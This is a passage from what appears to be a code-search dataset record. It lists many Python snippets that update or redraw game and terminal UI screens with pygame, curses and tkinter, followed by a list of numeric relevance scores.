0: # loss\n self.view.clear()\n self._mssg = (GLabel(text=LOSS_MSSG, x=GAME_WIDTH/2, y=GAME_HEIGHT/2, font_size=16))\n else: # win\n self.view.clear()\n self._mssg = (GLabel(text='You won! 
(' + str(self._game.getPoints()) + ' Points)' +\n WIN_MSSG, x=GAME_WIDTH/2, y=GAME_HEIGHT/2, font_size=16))\n \n if self._new_n_press():\n self._state = STATE_NEWGAME\n self._mssg = None", "def update(self):\n self.clear()\n self.score += 1\n self.write(f\"Score : {self.score}\",\n align=\"center\", font=(\"Arial Black\", 20))", "def update(self):\n (cursory, cursorx) = self.entryscreen.getyx()\n (rows, cols) = self.chatscreen.getmaxyx()\n\n def message_lines(message):\n words = message.split()\n accum = words[0]\n words = words[1:]\n while len(words) > 0:\n while True: \n accum += \" \"\n if len(words[0]) >= cols - 3:\n # if the word is too huge to fit on the screen (note that\n # there's 3 spaces for padding), split it into parts\n first_part = words[0][:cols - len(accum)]\n words[0] = words[0][len(first_part):]\n accum += first_part\n elif len(accum) + len(words[0]) < cols:\n # otherwise, just grab this word off the front\n accum += words[0]\n words = words[1:]\n else:\n # the word is not too big to fit on the screen, but it\n # is too big for this line\n break\n # have we filled up accum? are we out of stuff to print?\n if len(accum) >= cols or len(words) == 0:\n break\n yield accum\n accum = \" \"\n lines = list(itertools.chain(*[message_lines(msg) for msg in self.history]))\n\n # we can only print up to rows number of lines, and we save the last row\n # for the status bar\n lines = lines[-(rows-1):]\n\n for (row, line) in zip(range(len(lines)), lines):\n self.chatscreen.addstr(row, 0, line) \n self.chatscreen.clrtoeol()\n\n self._drawstatus()\n\n self.entryscreen.move(cursory, cursorx)\n self.entryscreen.cursyncup()\n self.chatscreen.noutrefresh()\n self.entryscreen.noutrefresh()\n curses.doupdate()", "def display(self):\n # remove everything on canvas\n self.c.delete(tk.ALL)\n level = self.history[-1][1]\n\n for i, row in enumerate(level):\n for j, case in enumerate(row):\n if case in COLORS:\n self.c.create_rectangle(*box(i,j), fill=COLORS[case])\n if case in self.IMAGES:\n self.c.create_image(*center(i,j), image=self.IMAGES[case])\n\n self.undo_button.config(state = tk.DISABLED if len(self.history) == 1 else tk.NORMAL)\n if sk.has_won(level):\n self.c.create_text((self.width/2, self.height/2),\n text=\"You have won!\", fill='red',\n font=(\"Purisa Bold\", 55))\n self.undo_button.config(state = tk.DISABLED)\n self.help.config(text=\"Press n for next level, q to quit\")\n\n text = '{0} moves done'.format(len(self.history) -1) if self.history > 1\\\n else '1 move done'\n if self.undo:\n text += ' and {} undo'.format(self.undo)\n self.score_label.config(text=text)", "def update(self):\n self._curses_window.clear()\n\n self._curses_window.addstr(0, 0,\n \"{:5s} {:5.1f}\".format(\n 'time:', round(time() - self.simulation_start, 1)\n )\n + \"\\t{:13s} {:4.1f}\".format(\n ' steps per s:', round(1 / global_vars.step_duration, 1)\n )\n + \"\\t{:4s} {:4d}\".format(' step:', global_vars.step)\n\t\t\t+ \"\\n{:4s} {:4d}{:1s}\".format('Death cause.. 
eaten:', global_vars.h_eaten, 'h')\n\t\t\t+ \"\\t{:4s} {:4d}{:1s}{:4d}{:1s}\".format(\n 'starved:', global_vars.h_starved, 'h/', global_vars.c_starved, 'c'\n )\n\t\t\t+ \"\\t{:4s} {:4d}{:1s}{:4d}{:1s}\".format(\n 'trampled:', global_vars.h_trampled, 'h/', global_vars.c_trampled, 'c'\n )\n + \"\\t{:4s} {:4d}{:1s}{:4d}{:1s}\".format(\n 'natural death:', global_vars.h_age, 'h/', global_vars.c_age, 'c'\n )\n )\n\n self._curses_window.noutrefresh()", "def update_turn(self):\n pass", "def refresh_view(self):\n if self._step_number % 2 == 0:\n self._view.draw_enemies(self._game.enemies)\n self._view.draw_towers(self._game.towers)\n self._view.draw_obstacles(self._game.obstacles)", "def update(self):\n self.m.update()", "def render(self):\n step = 1\n while step < self.number_steps and self.update():\n step += 1", "def update_score_window(self):\r\n\r\n if not self.display_game:\r\n return\r\n\r\n if self.score_window is not None:\r\n self.score_window.update_window()", "def update_display(self):\r\n\t\tfor message in self._scheduled_messages:\r\n\t\t\tmessage['Delay'] -= 1\r\n\t\t\tif (message['Delay'] == 0):\r\n\t\t\t\tif (message['Parameter'] != None):\r\n\t\t\t\t\tmessage['Message'](message['Parameter'])\r\n\t\t\t\telse:\r\n\t\t\t\t\tmessage['Message']()\r\n\t\t\t\t\tdel self._scheduled_messages[self._scheduled_messages.index(message)]\r\n\r\n\t\tfor callback in self._timer_callbacks:\r\n\t\t\tcallback()\r\n\t\tself._timer = (self._timer + 1) % 256\r\n\t\tif(self._timer == 0):\r\n\t\t\tself._selector._shift_pressed_timer = -12\r\n\t\tself.flash()", "def update_info(self):\n self.m_canvas.master.m_informations_displayer.set_operations(\n self.m_current_index\n )\n self.m_canvas.master.m_informations_displayer.set_time(\n self.m_history[self.m_current_index].m_passed_time\n )", "def update(self):\r\n pygame.display.update()\r\n return", "def update(self):\n gear_message = \"GEAR COLLECTED: %d\" % \\\n self.__num_gear_collected + \"/4\"\n self.image = self.__font.render(gear_message, 1, (255, 255, 255))\n self.rect = self.image.get_rect()\n \n # This message is positioned in the top-left corner of the screen\n self.rect.topleft = (10, 10)", "def render(self):\n i_start, _, width = self.screen_status\n\n if self.replay_tt is not None:\n aix_replay = bisect.bisect_left(\n self.replay_elapsed, self.tt.elapsed_seconds\n )\n aix_replay = min(self.replay_tt.n_actions - 1, aix_replay)\n i_replay = self.replay_uactions[aix_replay][0]\n\n if self.target_wpm is not None:\n i_target = self.tt.elapsed_seconds * 5 * self.target_wpm / 60\n i_target = min(self.tt.n_characters - 1, int(i_target))\n\n # rended text\n i_print = i_start\n current_ix_print = i_start\n for i, (alist, ch) in enumerate(zip(self.tt.actions, self.tt.text)):\n y, x = divmod(i_print, width)\n\n if i == self.current_ix or not alist:\n # character that we stand on needs to have backspace styling\n status = STATUS_BACKSPACE # same styling\n else:\n status = alist[-1].status\n\n if self.replay_tt is not None and i == i_replay != self.current_ix:\n if status in {STATUS_BACKSPACE, STATUS_CORRECT}:\n # Make sure the normal cursor is visible\n status = \"replay\"\n\n if self.target_wpm is not None and i == i_target != self.current_ix:\n if status in {STATUS_BACKSPACE, STATUS_CORRECT}:\n # Make sure the normal cursor is visible\n status = \"target\"\n\n if i == self.current_ix:\n current_ix_print = i_print\n\n if ch == \"\\n\":\n i_print += width - (i_print % width)\n self.pens[status].addch(self.stdscr, y, x, \" \")\n elif ch == \"\\t\":\n i_print 
+= 4\n self.pens[status].addstr(self.stdscr, y, x, 4 * \" \")\n else:\n i_print += 1\n self.pens[status].addch(self.stdscr, y, x, ch)\n\n # render cursor\n self.cursor.move_abs(self.y_start, self.x_start + current_ix_print)\n\n self.stdscr.refresh()", "def update_current_screen(self):\n\t\tself.current_screen.update()", "def updateWidget(self):\n\n if self.frame1.state() == 'normal':\n self.frame2.deiconify()\n self.frame1.withdraw()\n else:\n self.frame2.withdraw()\n self.frame2.update()\n self.frame2.deiconify()\n self.frame1.title(\"%s's turn\" % self.usernames[1])\n self.frame2.title(\"%s's turn\" % self.usernames[0])\n showDialogBox(\"%s's turn first!\" % self.usernames[0])\n self.frame1.update()\n self.frame2.update()", "def _update_screen(self):\n self.screen.fill((250,250,250))\n self.rocket.blitme()\n pygame.display.flip()", "def _update_display(self, loop=True):\n\n sensors_data = self.get_sensors_data()\n\n if self.current_item.entity_type is WeatherEntityType.TEMPERATURE:\n pixels = self.current_item.show_pixels(sensors_data[0])\n elif self.current_item.entity_type is WeatherEntityType.HUMIDITY:\n pixels = self.current_item.show_pixels(sensors_data[2])\n else:\n pixels = self.current_item.show_pixels(sensors_data[3])\n\n self._sense_hat.set_rotation(self.current_style.rotation)\n self._sense_hat.set_pixels(pixels)\n\n if loop:\n self._update_timer = self._start_timer(Config.UPDATE_INTERVAL, self._update_display)", "def update(self, board):\n self.update_border()\n self.update_score_and_level(board)\n self.update_next_piece(board)\n\n self.update_settled_pieces(board)\n\n self.update_falling_piece(board)\n self.update_shadow(board)\n\n self.refresh_screen()", "def updateScreen(self) -> None:\n\n # fill game display black\n self.surface.fill(Colors.Black)\n\n # draw players and ball\n self.drawImageOnSurface(self.player_one)\n self.drawImageOnSurface(self.player_two)\n self.drawImageOnSurface(self.ball)\n\n # draw all the spacer images\n for image in self.spacers:\n self.drawImageOnSurface(image)\n\n # draw scores and format the scores in byte representation\n self.drawTextOnSurface(format(self._score[0], \"04b\"),\n (Configuration.windowWidth / 4, Configuration.windowHeight / 2), Colors.ByteGreen,\n font=self.font)\n self.drawTextOnSurface(format(self._score[1], \"04b\"),\n (3 * Configuration.windowWidth / 4, Configuration.windowHeight / 2), Colors.ByteGreen,\n font=self.font)\n\n super().updateScreen() # call the parent method to update the screen", "def remote_update(self, increment):\r\n\r\n self.window += increment", "def update(self):\n self.screen.fill(blackColor)\n self.model.blocks.draw(self.screen)\n self.model.players.draw(self.screen)\n self.model.buttons.draw(self.screen)\n self.model.Coins.draw(self.screen)\n p1Score = myfont.render(\"Player 1 Score:\"+str(self.model.player1.score), 1, whiteColor)\n self.screen.blit(p1Score,(100,15))\n if self.model.playernum==2:\n p2Score = myfont.render(\"Player 2 Score:\"+str(self.model.player2.score), 1,whiteColor)\n self.screen.blit(p2Score,(1200,15))\n timerLimit = myfont.render(\"Time Limit:\" +str(self.model.time), 1, whiteColor)\n self.screen.blit(timerLimit, (700, 15)) \n pygame.display.update()", "def _update_screen(self):\n\t\tself.screen.fill(self.settings.bg_color)\n\t\tself.pigeon.blitme()\n\t\tfor dropping in self.droppings.sprites():\n\t\t\tdropping.draw_dropping()\n\t\tself.autos.draw(self.screen)\n\n\t\t# Draw the score information.\n\t\tself.sb.show_score()\n\n\t\t# Draw the play button if the game is 
inactive.\n\t\tif not self.stats.game_active:\n\t\t\tself.play_button.draw_button()\n\n\t\t# Make the most recently drawn screen visible.\n\t\tpygame.display.flip()", "def updateDisplay(self):\n if self._displayPjt:\n self._displayPjt.updateim()\n if self._displayUsr:\n self._displayUsr.updateim()\n if self._displayVtk:\n self._displayVtk.updateim()", "def display(self, takeTurn, level, playerMessage=\"\"):\n messages = [playerMessage]\n if takeTurn:\n # Turns\n stateCopy = self.copyState()\n for row in stateCopy[level]:\n for entity in row:\n if entity is not None:\n turnMessage = entity.onTurn()\n if turnMessage is not \"\": \n messages.append(turnMessage)\n # Deaths\n for i in range(self.rows-1):\n for j in range(self.cols):\n if self.state[level][i][j] is not None:\n if not self.state[level][i][j].alive:\n # kill the entity. If after calling onDeath() the\n # entity at [i][j] is not the same as the entity \n # that was there before (i.e. onDeath() spawned a\n # new entity there) then do nothing, but otherwise\n # set the entity at [i][j] to null\n tmp = self.state[level][i][j]\n self.state[level][i][j].onDeath()\n if self.state[level][i][j] == tmp:\n self.state[level][i][j] = None\n if self.player:\n messages.insert(0, self.player.getState())\n # Printing\n for i in range(self.rows-1):\n for j in range(self.cols):\n if self.state[level][i][j] is None or not self.state[level][i][j].alive:\n self.scr.addch(i, j, '.')\n else:\n self.scr.addstr(i, j, self.state[level][i][j].body)\n\n\n # Some of the messages will have newlines in them, which could make\n # this try to print off screen. So split the elements of messages at\n # the newlines\n splitMessages = []\n for msg in messages:\n splitMessages += msg.splitlines()\n\n # Can only display the last (msgBufferSize) messages, so pop all others\n for i in range(len(splitMessages) - msgBufferSize):\n splitMessages.pop(1) # 1, not 0 b/c must keep the player info\n\n # Wipe all text in message area before printing. 
Otherwise could have\n # old messages showing when they shouldn't be \n for i in range(msgBufferSize):\n self.scr.addstr(self.rows+i, 0, \" \"*self.cols)\n\n # Finally print the messages\n for line in range(len(splitMessages)):\n self.scr.addstr(self.rows+line, 0, splitMessages[line])\n self.scr.refresh()\n return", "def update(self, msg):\n pass", "def draw(self):\n self.screen.fill(Color.BLACK)\n self.screen.blit(self.red_block, self.apple)\n [self.screen.blit(self.green_block, xy) for xy in self.snake]\n self.screen.blit(self.white_bar, (0, 0))\n self.draw_text(str(self.score), self.score_pos, size=32)\n pygame.display.flip()", "def update(self):\n\n print(\"---\\n |\\n |\")\n print(self.__body__, \"\\n\\n\")", "def set_display_message(self, title=\"\", speaker=\"\"):\r\n if self.recording:\r\n self.talkInfoString.setText(\"RECORDING\\n\\nTime remaining:\")\r\n else:\r\n self.talkInfoString.setText(\"NEXT TALK\\nTitle: %s\\nSpeaker: %s\\n\\nTime until recording:\" % (title, speaker))", "def _display_loop(self):\n # Get & handle user input\n self._handle_input(self.screen.getch())\n\n # Only update if there's something to do - Improves performance drastically\n if self.updated:\n # Reset screen\n self.screen.clear()\n self.updated = False\n\n # Commands header & highlight current command\n self.screen.addstr('Every {:.1f}/{:.1f}s: | '.format(self.interval, self.cycle_interval), self.base_color)\n for i, command in enumerate(self.commands_str):\n self.screen.addstr(command, self.highlight_color if i == self.current_idx else self.base_color)\n self.screen.addstr(' | ', self.base_color) # Pad between commands\n\n # Add current date & time to header, pad to end of the line based on current position\n pad = self.max_col - self.screen.getyx()[-1] - self.time_pad\n self.screen.addstr(' '*pad + self.time_str + '\\n', self.base_color)\n\n # Display the current command's output\n self._display_command()\n\n self.screen.refresh() # Refresh must go before delay!\n time.sleep(self.DELAY) # Small delay to avoid stuttering but allow for smooth scrolling", "def update_talk(self):\r\n selected_talk = self.tableView.currentIndex()\r\n if selected_talk.row() >= 0: # The tableView index begins at 0 and is -1 by default\r\n talk_id = selected_talk.sibling(selected_talk.row(), 0).data().toString()\r\n presentation = self.create_presentation(self.talkDetailsWidget)\r\n\r\n if presentation:\r\n self.db.update_presentation(talk_id, presentation)\r\n self.apply_changes(selected_talk)\r\n self.talkDetailsWidget.saveButton.setEnabled(False)", "def update_mug(self, msg):\n # Create a transform from the wrist to the mug\n posn = [0, 0, 0.140]\n ornt = [0, 0.707, 0, 0.707]\n t_i = rospy.Time.now()\n self.send_pose(posn, ornt, \"right_hand\", \"mug_frame\", t_i)\n xform = self.tfBuffer.lookup_transform(\n \"base\", \"mug_frame\", rospy.Time(0))\n load_xform_into_pose(xform.transform, self.marker.pose)\n self.pub.publish(self.marker)", "def _show_message(self, message, message_color, background_color=(0, 0, 0)):\n\n # Need to be sure we revert any changes to rotation\n self._sense_hat.rotation = 0\n self._sense_hat.show_message(message, Config.SCROLL_TEXT_SPEED, message_color, background_color)", "def refresh_chat(self):\n self.chat_container.noutrefresh()\n self.chat_win.noutrefresh()\n curses.doupdate()", "def update(self):\n self.active = False\n self.top.update(self.rgb,self.cmyk,self.hsv)\n self.bot.update(self.rgb,self.cmyk,self.hsv)\n self.active = True", "def update_score_board(self):\n score = ''\n for key, 
value in self.model.game_score.items():\n score += key + \"-\" + str(value) + ':'\n if self.view.score_board_entry.get():\n self.view.score_board_entry.delete(0, tkinter.END)\n self.view.score_board_entry.insert('1', score)", "def redraw(self):\r\n self.c.update()", "def refresh(self) -> None:\n self.screen.refresh()", "def update(self):\n if self.pinky_wins:\n fill(1)\n textSize(50)\n text(\"PINKY WINS\", self.WIDTH/2 - 140, self.HEIGHT/2)\n if self.player_wins:\n fill(1)\n textSize(50)\n text(\"YOU WIN!!!\", self.WIDTH/2 - 140, self.HEIGHT/2)", "def update_window(self, window, frame):\n self.draw_eyes()\n self.show(window, frame)\n self.new_frame()", "def progress_game(self):\r\n\r\n if self.actions == len(self.players):\r\n # Reveal the 3 first cards\r\n output_text = \"Dealing the flop...\"\r\n\r\n self.new_output.emit(output_text)\r\n self.community_cards.flop()\r\n\r\n if self.actions == 2 * len(self.players):\r\n # Reveal a 4th card\r\n output_text = \"Dealing the turn...\"\r\n\r\n self.new_output.emit(output_text)\r\n self.community_cards.turn()\r\n\r\n if self.actions == 3 * len(self.players):\r\n # Reveal a 5th card\r\n output_text = \"Dealing the river...\"\r\n\r\n self.new_output.emit(output_text)\r\n self.community_cards.river()\r\n\r\n if self.actions == 4 * len(self.players):\r\n self.showdown()", "def screen_update(fill_blank=True):\n clear_screen()\n\n if g.content:\n xprint(g.content)\n\n if g.message or g.rprompt:\n length = c.charcount\n out = g.message or ''\n blanks = getxy().width - length(out) - length(g.rprompt or '') - 3\n out += ' ' * blanks + (g.rprompt or '')\n xprint(out)\n\n elif fill_blank:\n xprint(\"\")\n\n g.message = g.content = g.rprompt = False", "def paint(self):\n correct_guesses = 0\n while not self.to_stop:\n if correct_guesses >= 2:\n self.server_socket.send('end1;'.encode())\n try:\n x_and_y = self.server_socket.recv(1024).decode() # decrypting the data from the server.\\\n pos = x_and_y.split(\";\") # separating x and y\n if pos[0] == 'score':\n self.score += int(pos[1])\n correct_guesses += 1\n score_headline = Label(self.root2, text='score: ' + str(self.score), font=('bubble', 15), # the score\n bg='white', fg=\"black\", relief=\"solid\")\n score_headline.place(x=10, y=50)\n elif 'end' in x_and_y:\n self.to_stop = True\n else:\n try:\n if self.can_draw:\n for i in range(0, len(pos)-2, 2):\n x = int(pos[i])\n y = int(pos[i + 1])\n self.x, self.y = x, y\n x2, y2 = (x + 1), (y + 1)\n self.cv.create_oval((self.x, self.y, x2, y2), fill='black', width=5)\n except TclError:\n self.to_stop = True\n except ConnectionResetError:\n print(\"user disconnected\")\n except:\n print('an error ecourred')", "def render(self):\n # Get current window size\n h_new, w_new = self.stdscr.getmaxyx()\n # If the window has been resized\n if not (self.h == h_new and self.w == w_new):\n self.h, self.w = h_new, w_new # Update window dimensions\n # Clear the current window\n self.stdscr.clear()\n # Restore message count and y so all messages gets rerendered\n self.msg_count = 0\n self.curr_y = 0\n # Calculate how many lines for each message\n line = self.calc_lines()\n # Delete old messges to fit the new messages in\n self.del_old_msg(line)\n # Render unrendered messages\n for i, msg in enumerate(self.message_log[self.msg_count:]):\n self.msg_count += 1\n try:\n self.render_message(msg['user'], msg['msg'], mode=msg['mode'])\n except curses.error:\n return\n # Clear screen after the last message\n for offset in range(self.h - self.curr_y - 1):\n try:\n 
self.stdscr.hline(self.curr_y + offset, 0, ord(' '), self.w)\n except curses.error:\n return\n # Render text input\n try:\n self.render_input()\n except curses.error:\n return\n # Refresh window\n self.stdscr.refresh()", "def update(self):\n if self.game_over is False:\n self.player_turn = not self.player_turn\n self.turn_display_timer = self.TURN_TEXT_TIMER", "def upd_view():\n global state, current_view, show_actives, current_filename\n nonlocal img, listbox\n\n with data_lock:\n if state == 1:\n current_filename = None\n state = 2\n listbox.delete(0, tk.END)\n for item in current_view.actions.by_type(wtl.actions.Click):\n wtl_uid = str(item.target.wtl_uid)\n text = item.target.metadata[\"text\"]\n listbox.insert(tk.END, wtl_uid + f\" ({text})\")\n\n if state == 2:\n filename = \"first\" if show_actives.get() == 0 else \"is_active\"\n if filename != current_filename:\n current_filename = filename\n current_view.snapshot.screenshots[filename].save(Path(\".\"))\n img = tk.PhotoImage(file=f\"{filename}.png\")\n canvas.create_image(5, 5, anchor=tk.NW, image=img)\n\n window.after(250, upd_view)", "def draw(self):\n self._background.draw(self.view)\n if self._state == STATE_INACTIVE:\n self._message.draw(self.view)\n if self._state == STATE_COUNTDOWN:\n self._game.draw(self.view)\n self._countdownMessage.draw(self.view)\n self._soundImage.draw(self.view)\n if self._state == STATE_ACTIVE:\n self._game.draw(self.view)\n self._soundImage.draw(self.view)\n if self._state == STATE_PAUSED:\n self._game.draw(self.view)\n self._pausedMessage.draw(self.view)\n if self._state == STATE_RESET:\n self._message.draw(self.view)\n if self._state == STATE_COMPLETE:\n self._game.draw(self.view)\n self._pausedMessage.draw(self.view)", "def display_result(self) -> None:\n winner = self.state.winner\n if winner:\n self._display_message(winner + ' wins!')\n else:\n self._display_message('Draw')\n\n self._display_message(\n f'\\n{self.state.player1} has {self.state.player1_score} wins'\n )\n self._display_message(\n f'{self.state.player2} has {self.state.player2_score} wins\\n'\n )", "def draw(self):\n self.window.clear()\n # Draw heads up display\n views.hud(self)\n # Refresh the messages on screen\n queue.draw(self.window)\n # Draw the map\n self.camera.draw(self.window, self.world, point=(self.player.x, self.player.y))", "def draw(self):\n ui.clear()\n ui.draw_board(self)\n ui.output_buffer()", "def show_message(message, col=c.r, update=False):\n g.content = generate_songlist_display()\n g.message = col + message + c.w\n\n if update:\n screen_update()", "def update(self):\n message = \"SCORE = %d\" % self.score\n self.image = self.__font.render(message, 1, (255, 255, 255))\n self.rect = self.image.get_rect()\n self.rect.centerx = 240\n self.rect.centery = 50", "def update_screen(self, ai_game):\r\n self.surface.fill(self.settings.bg_color)\r\n self.ship.blitme()\r\n for bullet in self.ship_bullets.sprites():\r\n bullet.draw_bullet()\r\n for bullet in self.alien_bullets.sprites():\r\n bullet.draw_bullet()\r\n self.aliens.draw(self.surface)\r\n self.explosions.draw(self.surface)\r\n\r\n # Draw the score information.\r\n self.sb.show_score()\r\n\r\n # Draw the difficulty buttons if the game is inactive.\r\n if not self.stats.game_active:\r\n for button in self.buttons:\r\n button.draw_button()\r\n\r\n # Draw the game over message if appropriate\r\n if self.stats.game_over:\r\n self.surface.blit(self.game_over_text, self.game_over_text_rect)\r\n\r\n # Make the most recently drawn screen visible.\r\n 
self.screen.blit(self.surface, (0, 0))\r\n pg.display.flip()", "def update(self, msg):\r\n self.msgVar.set(msg)", "def update(self, msg):\r\n self.msgVar.set(msg)", "def updateWindow(gameWindow, figurelist, rounds):\n for item in gameWindow.items[:]:\n item.undraw() #Remove al elements in game window\n\n gameWindow.update() #update to ensure al is gone\n\n for i in range(15): #For loops to draw new figures\n for k in range(25):\n todraw = figurelist[i][k]\n todraw.draw(gameWindow)\n \n scoreText = str(\"Pick number:\" + str(rounds)) #Show how many times a color has been picked(Shows 1 on first round)\n toPrint = g.Text(g.Point(100, 775), scoreText) #Create text to print\n\n toPrint.draw(gameWindow) #Draws text with rounds", "def phase_7(self):\n\n test_board_1 = board(5, 5, snake_init_coordinates = [4, 2], fruit_init_coordinates = [0, 2])\n render = Render_engine('terminal', test_board_1)\n print(\"Before grow\")\n print(\"*******************************\")\n render.render_terminal(test_board_1)\n print(\"Now, Snake's length is {}\".format(len(test_board_1.Snake)))\n\n print(\"\\n\\nafter grow once\")\n print(\"*******************************\")\n test_board_1.Snake_grow(\"right\")\n test_board_1.Update_board()\n render.render_terminal(test_board_1)\n print(\"Now, Snake's length is {}\".format(len(test_board_1.Snake)))\n\n print(\"\\n\\nafter grow twice\")\n print(\"*******************************\")\n test_board_1.Snake_grow(\"right\")\n test_board_1.Update_board()\n render.render_terminal(test_board_1)\n print(\"Now, Snake's length is {}\".format(len(test_board_1.Snake)))\n\n print(\"\\n\\nafter grow three times\")\n print(\"*******************************\")\n test_board_1.Snake_grow(\"right\")\n test_board_1.Update_board()\n render.render_terminal(test_board_1)\n print(\"Now, Snake's length is {}\".format(len(test_board_1.Snake)))", "def _update_display(self, game, action):\n canvas_coord = self._havannah_coord_to_canvas_coord(action.coord)\n canvas_color = self._havannah_color_to_canvas_color(action.color)\n self._draw_hex(canvas_coord, canvas_color)", "def update_display(self):\n self.lick_plot_0.setData(self.k+self.T,self.buffer[:,1]) \n self.lick_plot_1.setData(self.k+self.T,self.buffer[:,2]) \n self.breathing_plot.setData(self.k+self.T,self.buffer[:,0]) \n \n if self.settings.movie_on.value():\n self.camera_image.setImage(self.camera.read())\n if self.settings.save_movie.value():\n self.camera.write()\n \n #print(self.buffer_h5.size)", "def run(self):\r\n \r\n if not self.gameOver:\r\n screen.fill(COLOR3)\r\n self.board.drawBoard()\r\n self.handleEvents()\r\n for piece in self.board.pieces.values():\r\n piece.update()\r\n else:\r\n self.resetGame()\r\n pygame.display.update()", "def update(self,msg):\r\n print msg[0]\r\n if msg[0]==\"End Of Building\":\r\n self.view.Classify_Button.configure(state=\"normal\") \r\n self.view.show_updates(\"\"+\"\",\"all done it took \"+str(time.time()-self.start))\r\n self.__rang=msg[1]\r\n self.__numeric=msg[2]\r\n self.__statistics=msg[3]\r\n self.__k=msg[-3]\r\n self.__classes=msg[-2]\r\n self.__abs_n=msg[-1]\r\n self.view.update(\"Build is done, please click on Classify.\")\r\n\r\n elif msg[0]==\"All Done\":\r\n self.view.show_updates(\"\"+\"\",\"all done it took \"+str(time.time()-self.start))\r\n self.view.update(\"All Done Open \"+os.path.join(self.__path,'Output.txt')+\" for results.\")\r\n else:\r\n self.view.show_updates(\"Last operation: \"+self.prevmsg,\"Now working on \"+msg[0])\r\n self.prevmsg=msg[0]", "def 
update_score_other_rounds(self, match):\n self.match_views.update_score(match)", "def update(self):\n self.redraw()\n self._changed = False", "def update(self):\n self.redraw()\n self._changed = False", "def redrawWindow(surface):\r\n global rows, width, s, snack\r\n surface.fill((0,0,0)) # fill whole window with black colour\r\n s.draw(surface) #put snake in window\r\n snack.draw(surface) #put snack in window\r\n drawGrid(width,rows, surface) #draw grid structure\r\n pygame.display.update() #displays updated window\r", "def draw(self, draw_surface):\n self.confirmed_dialogue.draw(draw_surface)", "def play_game(self):\n print('Welcome to Tetris! To play, press \"j\" to move Left, \"l\" to move Right, and \"k\" to '\n 'Invert the piece.')\n raw_input('Press any key to acknowledge.')\n board.add_piece()\n board.display_piece()\n board.display_board()\n while True:\n over = board.update_board_and_check_for_eog()\n if over:\n print over\n break\n board.display_board()\n start = time.time()\n while time.time() - start < self.refresh_rate:\n direction = board.get_input() # right, left\n if direction:\n board.display_piece(clear=True)\n board.move_piece(direction=direction)\n board.display_board()\n time.sleep(0.1)\n print 'You got {} points!'.format(board.points)\n return", "def win(self):\n self.score += 1\n self.ids['score'].text = 'SCORE: ' + str(self.score)", "def __redrawChat(self):\n self.__chatWin.clear()\n chats = self._client.currentChannel().chatHistory()\n count = min(len(chats), self.__chatWin.getmaxyx()[0])\n shown = chats[-count:]\n for c in shown:\n self.__chatWin.addstr(c + \"\\n\")\n\n self.__update()", "def guess_mode(self):\n self.can_draw = True\n timer_thread = threading.Thread(target=self.timer) # starting a timer\n timer_thread.daemon = True\n timer_thread.start()\n\n headline = Label(self.root2, text=self.username) # the name of the user on top of the screen.\n headline.pack()\n self.cv.pack()\n score_headline = Label(self.root2, text='score: ' + str(self.score), font=('bubble', 15), # the score\n bg='white', fg=\"black\", relief=\"solid\")\n score_headline.place(x=10, y=50)\n strikes_headline = Label(self.root2, text='strikes: ' + str(self.strikes), font=('bubble', 15),\n bg='white', fg=\"black\", relief=\"solid\") # the strikes the user have left.\n strikes_headline.place(x=10, y=20)\n guess = Entry(self.root2, relief='solid', font=('bubble', 10), bg='white', fg=\"black\")\n guess.delete(0, END)\n guess.insert(0, 'enter a guess')\n guess.place(x=100, y=400)\n submit_button = Button(self.root2, text=\"submit\", relief=\"solid\",\n font=('cooper black', 10), fg=\"black\", bg=\"#%02x%02x%02x\" % (255, 255, 255),\n command=lambda: self.check_guess(guess, submit_button))\n submit_button.place(x=400, y=400)\n server_handler = threading.Thread(target=self.paint)\n server_handler.daemon = True\n # creating a thread that handles with the data the server sends to the client, w function 'paint'.\n server_handler.start()\n self.root2.mainloop()", "def _refresh_render(self):\n current_frame = self.frame\n self.frame = int(1E6)\n self.frame = current_frame", "def update(self):\n self.screen.blit(self.dial, (DIAL_POS))\n self.screen.blit(self.rotatedImage, self.rotatedImageRectangle)", "def update_screen(self):\r\n\r\n # Redraw the screen during each pass through the loop.\r\n self._screen.fill(self._bb_settings.bg_color)\r\n\r\n # Redraw all markers around edge of board\r\n\r\n # Draw the play button if the game is inactive\r\n if self._stats.get_status() == \"Start_game\":\r\n for 
button in self._play_mode_button_list:\r\n button.draw_button()\r\n elif self._stats.get_status() == \"replay\":\r\n for button in self._replay_button_list:\r\n button.draw_button()\r\n else:\r\n self.blitme()\r\n shoot_markers = self.get_entry_exit()\r\n atom_markers = self.get_atom_guess()\r\n for marker in shoot_markers.values():\r\n marker[1].draw_marker()\r\n for atom in atom_markers.values():\r\n atom.draw_marker()\r\n # Make the most recently drawn screen visible.\r\n pygame.display.flip()", "def update_stockfish(self):\n if (self.show_stockfish and\n \"pscore\" in self.game.info[self.halfmove]):\n self.stock_buffer.set_text(\n (\"Score: {pscore:.1f} ({score})\\n\" +\n \"Depth: {depth} ({seconds:.1f} sec)\\n\" +\n \"PV : {pv}\").format(\n **self.game.info[self.halfmove]))\n else:\n self.stock_buffer.set_text(\"\")", "def render(self):\n self.screen.reset()\n\n # draw snake\n surface = pymlgame.Surface(self.screen.width, self.screen.height)\n for part in self.snake.parts:\n surface.draw_dot(part, pymlgame.RED)\n self.screen.blit(surface)\n\n # draw apple\n self.screen.blit(self.apple_surface, self.apple)\n\n if self.snake.parts[0] == self.oldapple:\n self.snake.grow = True\n self.oldapple = None\n\n self.screen.update()\n\n #TODO: accelerate every 5 points by 1 fps\n self.clock.tick()", "def show_board(self, game):\n\n self.screen.clear()\n self.show_banner()\n self.show_score(game)\n self.show_towers(game.board)\n self.screen.refresh()" ]
[ "0.60637283", "0.60512704", "0.6037003", "0.6004294", "0.5950593", "0.59421533", "0.59291905", "0.5891295", "0.5876253", "0.58727294", "0.584074", "0.5837629", "0.58247244", "0.58215046", "0.5802971", "0.5793627", "0.57535934", "0.57366675", "0.5722204", "0.5721105", "0.5720504", "0.5713582", "0.57123154", "0.57120526", "0.5709929", "0.5704003", "0.56968915", "0.56812036", "0.568043", "0.5676974", "0.5676159", "0.56754553", "0.5675301", "0.5672773", "0.566529", "0.5636117", "0.56312853", "0.5630546", "0.5628465", "0.56269413", "0.56235605", "0.5616468", "0.56002074", "0.55983394", "0.5559656", "0.55584383", "0.55563223", "0.5547421", "0.55426186", "0.55323297", "0.55288476", "0.5528343", "0.5485539", "0.5477978", "0.5476608", "0.54718417", "0.5470689", "0.5469738", "0.54689604", "0.5467437", "0.5465498", "0.54641026", "0.54633707", "0.5456213", "0.5451998", "0.54498804", "0.5429624", "0.54281837", "0.542734", "0.5419599", "0.5419483", "0.54187477", "0.5417958", "0.5407276", "0.5398314", "0.5392637", "0.53904366", "0.538987", "0.538987", 